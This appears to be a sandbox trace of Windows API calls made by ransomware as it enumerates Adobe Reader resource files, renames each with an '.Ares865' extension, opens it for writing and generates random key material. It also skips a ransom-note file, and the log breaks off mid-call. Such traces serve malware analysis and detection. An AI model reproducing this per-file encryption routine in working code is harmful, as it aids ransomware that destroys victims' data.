lstrlenW (lpString="hrvphon.env.Ares865") returned 19 [0157.855] lstrlenW (lpString="Ares865") returned 7 [0157.855] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0157.855] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e0ced80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hun.fca", cAlternateFileName="")) returned 1 [0157.855] lstrcmpiW (lpString1="hun.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0157.855] lstrcmpiW (lpString1="hun.fca", lpString2="aoldtz.exe") returned 1 [0157.855] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hun.fca" | out: lpString1="hun.fca") returned="hun.fca" [0157.855] lstrlenW (lpString="hun.fca") returned 7 [0157.855] lstrlenW (lpString="Ares865") returned 7 [0157.856] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca.Ares865") returned 103 [0157.856] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.fca.ares865"), dwFlags=0x1) returned 1 [0157.858] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.858] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1116) returned 1 [0157.858] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.859] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.859] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.861] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.862] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.862] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.862] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hun.hyp" | out: lpString1="hun.hyp") returned="hun.hyp" [0157.862] lstrlenW (lpString="hun.hyp") returned 7 [0157.862] lstrlenW (lpString="Ares865") returned 7 [0157.863] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp.Ares865") returned 103 [0157.863] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.hyp.ares865"), dwFlags=0x1) returned 1 [0157.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=114688) returned 1 [0157.865] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.867] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.867] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.874] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.876] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.876] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.878] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hun109.hsp" | out: lpString1="hun109.hsp") returned="hun109.hsp" [0157.878] lstrlenW (lpString="hun109.hsp") returned 10 [0157.878] lstrlenW (lpString="Ares865") returned 7 [0157.878] lstrcmpiW (lpString1="109.hsp", lpString2="Ares865") returned -1 [0157.878] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp.Ares865") returned 106 [0157.878] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun109.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun109.hsp.ares865"), dwFlags=0x1) returned 1 [0157.880] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun109.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=650936) returned 1 [0157.881] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.881] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.881] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.919] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.919] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.919] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.928] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hun32.clx" | out: lpString1="hun32.clx") returned="hun32.clx" [0157.928] lstrlenW (lpString="hun32.clx") returned 9 [0157.928] lstrlenW (lpString="Ares865") returned 7 [0157.928] lstrcmpiW (lpString1="n32.clx", lpString2="Ares865") returned 1 [0157.928] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx.Ares865") returned 105 [0157.928] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun32.clx.ares865"), dwFlags=0x1) returned 1 [0157.936] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.936] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32754) returned 1 [0157.936] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.937] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.937] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.944] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.944] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.944] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.945] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="itl.fca" | out: lpString1="itl.fca") returned="itl.fca" [0157.945] lstrlenW (lpString="itl.fca") returned 7 [0157.945] lstrlenW (lpString="Ares865") returned 7 [0157.946] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca.Ares865") returned 103 [0157.946] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.fca.ares865"), dwFlags=0x1) returned 1 [0157.948] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1004) returned 1 [0157.948] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.949] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.949] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.953] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.954] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="itl.hyp" | out: lpString1="itl.hyp") returned="itl.hyp" [0157.954] lstrlenW (lpString="itl.hyp") returned 7 [0157.954] lstrlenW (lpString="Ares865") returned 7 [0157.955] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp.Ares865") returned 103 [0157.955] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.hyp.ares865"), dwFlags=0x1) returned 1 [0157.971] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.971] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4096) returned 1 [0157.972] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.973] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.973] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.977] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.978] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.978] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.978] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="itl26.hsp" | out: lpString1="itl26.hsp") returned="itl26.hsp" [0157.978] lstrlenW (lpString="itl26.hsp") returned 9 [0157.978] lstrlenW (lpString="Ares865") returned 7 [0157.978] lstrcmpiW (lpString1="l26.hsp", lpString2="Ares865") returned 1 [0157.979] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp.Ares865") returned 105 [0157.979] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl26.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl26.hsp.ares865"), dwFlags=0x1) returned 1 [0157.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl26.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=192484) returned 1 [0157.986] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.986] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.986] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.999] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.000] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.003] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="itl32.clx" | out: lpString1="itl32.clx") returned="itl32.clx" [0158.003] lstrlenW (lpString="itl32.clx") returned 9 [0158.003] lstrlenW (lpString="Ares865") returned 7 [0158.003] lstrcmpiW (lpString1="l32.clx", lpString2="Ares865") returned 1 [0158.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx.Ares865") returned 105 [0158.003] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl32.clx.ares865"), dwFlags=0x1) returned 1 [0158.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.006] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32763) returned 1 [0158.007] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.007] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.007] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.012] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.012] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.012] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.013] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="itl61.ths" | out: lpString1="itl61.ths") returned="itl61.ths" [0158.013] lstrlenW (lpString="itl61.ths") returned 9 [0158.013] lstrlenW (lpString="Ares865") returned 7 [0158.013] lstrcmpiW (lpString1="l61.ths", lpString2="Ares865") returned 1 [0158.014] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths.Ares865") returned 105 [0158.014] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl61.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl61.ths.ares865"), dwFlags=0x1) returned 1 [0158.016] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl61.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.016] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=188416) returned 1 [0158.016] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.017] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.027] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.027] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.027] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.030] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lav.hyp" | out: lpString1="lav.hyp") returned="lav.hyp" [0158.030] lstrlenW (lpString="lav.hyp") returned 7 [0158.030] lstrlenW (lpString="Ares865") returned 7 [0158.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp.Ares865") returned 103 [0158.031] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav.hyp.ares865"), dwFlags=0x1) returned 1 [0158.034] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.034] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13312) returned 1 [0158.034] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.035] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.035] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.038] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.038] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.038] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.039] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lav135.lex" | out: lpString1="lav135.lex") returned="lav135.lex" [0158.039] lstrlenW (lpString="lav135.lex") returned 10 [0158.039] lstrlenW (lpString="Ares865") returned 7 [0158.039] lstrcmpiW (lpString1="135.lex", lpString2="Ares865") returned -1 [0158.040] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex.Ares865") returned 106 [0158.040] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav135.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav135.lex.ares865"), dwFlags=0x1) returned 1 [0158.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav135.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=184320) returned 1 [0158.043] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.043] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.043] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.053] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.054] CryptGenRandom (in: hProv=0x2f0518, 